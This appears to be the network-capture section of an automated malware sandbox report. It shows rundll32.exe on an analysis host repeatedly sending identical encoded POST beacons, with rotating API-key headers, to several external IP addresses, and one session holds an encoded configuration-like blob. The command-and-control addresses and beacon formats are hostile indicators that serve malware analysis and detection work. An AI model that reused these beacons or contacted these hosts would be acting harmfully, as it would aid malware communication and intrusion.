        Data Raw: 39 34 2e 31 30 33 2e 39 30 2e 39 3b 32 36 33 39 35 3b 68 6b 4f 36 74 30 6a 36 74 66 69 76 70 6d 53 47 3a 69 35 4f 2f 4f 72 35 2f 33 46 30 31 51 41 4c 39 31 51 45 35 5a 78 70 2e 31 6d 75 32 58 6d 37 2e 72 57 53 37 38 48 64 30 71 33 75 2e 41 6d 69 33 33 47 47 38 51 39 39 2c 37 6a 39 68 41 41 45 74 6e 70 5a 74 31 6b 6d 70 73 42 47 3a 73 42 76 2f 48 33 6d 2f 59 4f 6a 39 4c 70 67 31 45 77 6b 2e 4e 4e 6a 31 79 78 67 34 68 38 7a 32 6f 4b 66 2e 65 33 4d 37 6f 54 6e 34 55 58 63 2e 33 36 39 32 58 53 53 38 7a 37 73 2c 33 6f 4d 68 51 76 31 74 52 63 33 74 67 73 62 70 4d 66 65 3a 35 37 79 2f 4a 4b 45 2f 69 38 59 37 47 6c 39 37 49 4c 74 2e 42 61 55 32 4e 56 55 33 43 6d 54 38 6a 72 58 2e 64 53 59 32 38 73 6c 32 70 31 59 34 56 45 57 2e 5a 34 6e 35 4c 35 61 36 68 4c 47 2c 54 49 71 68 32 69 36 74 79 79 41 74 54 4a 4c 70 6d 35 4d 3a 75 39 4e 2f 44 49 36 2f 74 53 53 37 47 66 58 37 6a 38 77 2e 58 37 35 32 34 57 64 33 6b 5a 34 38 45 52 58 2e 58 73 67 32 77 53 6b 32 38 78 37 39 6d 77 34 2e 72 78 78 36 74 46 35 33 4e 33 36 [TRUNCATED]
        Data Ascii: 94.103.90.9;26395;hkO6t0j6tfivpmSG:i5O/Or5/3F01QAL91QE5Zxp.1mu2Xm7.rWS78Hd0q3u.Ami33GG8Q99,7j9hAAEtnpZt1kmpsBG:sBv/H3m/YOj9Lpg1Ewk.NNj1yxg4h8z2oKf.e3M7oTn4UXc.3692XSS8z7s,3oMhQv1tRc3tgsbpMfe:57y/JKE/i8Y7Gl97ILt.BaU2NVU3CmT8jrX.dSY28sl2p1Y4VEW.Z4n5L5a6hLG,TIqh2i6tyyAtTJLpm5M:u9N/DI6/tSS7GfX7j8w.X7524Wd3kZ48ERX.Xsg2wSk28x79mw4.rxx6tF53N36,fDzhjist0JDtjPKpt1U:ZPz/9fl/PMu7ZLI7N4a.WUv2PAK3lUa89jI.bZJ2dZu5ujp0S8e.Wxk1oNG2TWy3R7P
        Aug 9, 2024 19:29:18.494987965 CEST | 6 | OUT | Data Raw: 00
        Data Ascii:
        Aug 9, 2024 19:29:48.694083929 CEST | 6 | OUT | Data Raw: 00
        Data Ascii:


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        2 | 192.168.2.4 | 49743 | 195.2.70.38 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:49.683842897 CEST | 293 | OUT | POST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 9p7rm0wE
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:50.384175062 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        3 | 192.168.2.4 | 49744 | 195.2.70.38 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:49.774321079 CEST | 293 | OUT | POST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: AZxF0cl2
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:50.488085032 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        4 | 192.168.2.4 | 49745 | 91.142.74.28 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:50.391410112 CEST | 294 | OUT | POST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: Ndivacfu
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.081151962 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        5 | 192.168.2.4 | 49746 | 91.142.74.28 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:50.495434999 CEST | 294 | OUT | POST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: YWqi881N
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.205766916 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        6 | 192.168.2.4 | 49747 | 77.238.224.56 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:51.088288069 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: pSH0uf0r
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.686045885 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        7 | 192.168.2.4 | 49748 | 77.238.224.56 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:51.213885069 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: nHAjwczh
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.814228058 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        8 | 192.168.2.4 | 49749 | 77.238.229.63 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:51.693206072 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 7JOwxDih
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.289711952 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        9 | 192.168.2.4 | 49750 | 77.238.229.63 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:51.822561026 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: tfj4nXhJ
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.422346115 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        10 | 192.168.2.4 | 49751 | 77.238.250.123 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:52.297672987 CEST | 296 | OUT | POST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: rckIC1PP
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.919675112 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        11 | 192.168.2.4 | 49752 | 77.238.250.123 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:30:52.432462931 CEST | 296 | OUT | POST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: wdTOKsK4
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:53.041307926 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        12 | 192.168.2.4 | 49753 | 195.2.70.38 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:22.960441113 CEST | 293 | OUT | POST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: iqzDLg5J
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:23.661927938 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:23 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        13 | 192.168.2.4 | 49754 | 195.2.70.38 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:23.045965910 CEST | 293 | OUT | POST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: QhzyDspD
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:23.778482914 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:23 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        14 | 192.168.2.4 | 49755 | 91.142.74.28 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:23.670452118 CEST | 294 | OUT | POST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: jc0iQUxH
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:24.374453068 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        15 | 192.168.2.4 | 49756 | 91.142.74.28 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:23.790730953 CEST | 294 | OUT | POST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: ps278JPe
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:24.499926090 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        16 | 192.168.2.4 | 49757 | 77.238.224.56 | 80 | 7100 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
        Aug 9, 2024 19:31:24.383058071 CEST | 295 | OUT | POST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: ng2Esf7E
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:25.000452995 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:31:24 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        17 | 192.168.2.4 | 49758 | 77.238.224.56 | 80 | 7020 | C:\Windows\SysWOW64\rundll32.exe
        Timestamp | Bytes transferred | Direction | Data
